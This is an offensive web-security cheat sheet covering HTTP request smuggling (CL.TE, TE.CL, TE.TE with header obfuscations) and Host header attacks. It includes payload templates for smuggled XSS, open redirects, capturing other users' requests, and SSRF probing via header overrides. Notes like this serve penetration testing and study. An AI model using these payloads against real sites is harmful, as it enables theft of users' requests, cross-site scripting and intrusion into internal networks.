# HTTP

## HTTP Smuggling

A smuggling vulnerability happens beacuse there are multiple ambiguous ways to define the length of an HTTP request the `Content-Length` header and the `Transfer-Encoding` header that is used to define the total length of a message split in chunked requests. Clients and servers may parse these headers differently and allow to include unexpected code in a HTTP request

Example of a chunked request

```
POST ... HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b    #start delimiter
<body>
0    #end delimiter
```

#### CL.TE Exploit

Front end uses `Content-Length` and back end uses `Transfer-Encoding`

```
POST / HTTP/1.1
Host: <website>
Content-Length: 13    #count from line 5 included to the delimiter
Transfer-Encoding: chunked

0

STRING HERE
```

If during the test you receive an "Header duplicated" error use the following request to override the header

```
POST / HTTP/1.1
Host: <website>
Content-Length: 139
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: <website>
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=    #all headers set in the legitimate request end up as parameters in the body
```

#### TE.CL Exploit

Front end uses `Transfer-Encoding` and back end uses `Content-Length`

```
POST / HTTP/1.1
Host: <website>
Content-Length: 3    #length from line 5 to 6 included
Transfer-Encoding: chunked

b                    #length in HEX of the lines between the first and second terminators
STRING HERE
0
[\r\n\r\n]
```

#### TE.TE Exploit

Both the client and the server use `Transfer-Encoding` but one of them can be tricked to not parse the header by obfuscating it

```
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[\t]chunked
 Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

Complete request

```
POST / HTTP/1.1
Host: <website>
Content-Length: 3    #length from line 5 to 7 excluded
Transfer-Encoding: chunked
<obfuscated transfer encoding header>

b                    #length in HEX of the lines between the first and second terminators
STRING HERE
0
[\r\n\r\n]
```

### Reflected XSS

Allows to easily target an HTTP header and body. When a user sends his request it will be appended to the malicious smuggled request and will trigger the XSS vulnerability without requiring interaction

```
POST / HTTP/1.1
Host: <target>
Content-Length: <len>
Transfer-Encoding: chunked

0

GET / HTTP/1.1
<header>: <XSS>
Foo: X
```

### Open redirect

Allows to redirect the user to an arbitrary site by overwriting the `Host` header

```
POST / HTTP/1.1
Host: <target>
Content-Length: <len>
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: <redirect to>
Foo: X
```

### Reflect a user's request as value of an argument

Allows to steal a HTTP request from a user and print it as the value of a parameter in a GET or POST request

```
GET / HTTP/1.1
Host: <target>
Transfer-Encoding: chunked
Content-Length: <len>

0

POST <req> HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: <len>
<param>=
```

For instance if the target request is like `/save?username=usr&msg=text` it is possible to steal the next user's request with the following payload and navigating to a point in the site where the msg parameter is displayed

```
GET / HTTP/1.1
Host: <target>
Transfer-Encoding: chunked
Content-Length: <len>

0

POST <req> HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: <len>
/save?username=usr&msg=
```

## Host Header Attacks

The host header is used to inform balancers and front end server to where to redirect the user. By tampering this header it is possible to perform SSRF attacks. To find vulnerabilities in how the Host header is parsed by using the following steps

* Send an arbitrary host
* Check for host validation where only the url is validated and not the port `hostsite.com:evil`
* Try to send a request with an url as part of an accepted subdomain `evil-hostsite.com` or `evilhostsite.com`
* Duplicate the Host header
* Add indentation before or after the header such as tabs spaces and&#x20;
* Sending the request to a full url instead of a relative one may lead the server to parse the header differently

### Header overwrite

It is possible to overwrite the value of Host by adding one on the following headers to the request

```
X-Forwarded-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
```

### SSRF

Controlling the Host header allows to scout the internal network of the target machine in order to find other servers. To verifiy the vulnerability replace the Host value with the url of a server you control. If you receive a hit from the target machine or another one in the same network then the servers are vulnerable and you can use bruteforce or dictionary attacks to locate new machines. If the response is a redirect (3XX) then the machine with the given hostname or ip address exists